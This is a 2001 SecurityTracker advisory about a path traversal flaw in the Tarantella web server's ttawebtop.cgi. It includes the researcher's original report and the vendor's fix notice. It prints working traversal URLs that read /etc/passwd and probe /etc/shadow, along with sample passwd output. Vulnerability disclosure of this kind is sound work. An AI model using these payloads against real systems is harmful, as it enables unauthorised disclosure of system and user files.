(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users
|
|
SecurityTracker Alert ID: 1001782 |
|
SecurityTracker URL: http://securitytracker.com/id/1001782
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 19 2001
|
Impact:
Disclosure of system information, Disclosure of user information
|
Fix Available: Yes Vendor Confirmed: Yes
|
Version(s): 3.00 and 3.01 only
|
Description:
A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.
The vunerability reportedly resides in the ttawebtop.cgi module.
If a remote user issues the following type of example URL, the server will return the world-readable password file:
http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:
http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
File missing
The following file could not be found:
/tarantella/../../../../../../../../../../../../../../../etc/shadow
The vendor has reportedly been notified.
|
Impact:
A remote user can obtain world-readable files located anywhere from the server.
|
Solution:
The vendor notes that this vulnerability was introduced in release 3.01 and was caught during a security audit and was fixed in the last release (Tarantella 3.10). The only vulnerable versions are reported to be releases 3.00 and 3.01.
To fix this problem, the vendor recommends upgrading to 3.10.
|
Vendor URL: www.tarantella.com/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
|
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Tue, 19 Jun 2001 15:09:35 +0100
Subject: Re: SCO Tarantella Remote file read via ttawebtop.cgi
|
On Monday June 18, KF wrote:
> SCO has been notified of this issue.
>
>
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslash@snosoft.com>
> To: recon@snosoft.com
>
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
>
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
>
>
> No perms to shadow...
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
>
>
> File missing
>
> The following file could not be found:
>
>
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
>
> Please give this information to a Tarantella Administrator.
>
> -KF
This problem was introduced in release 3.01 and was caught during a security
audit and was fixed for our last release (Tarantella 3.10).
It is a problem for releases 3.00 and 3.01 only.
To fix this problem upgrade to 3.10.
Thank you for reporting this problem.
- Mike McEwen
|
|
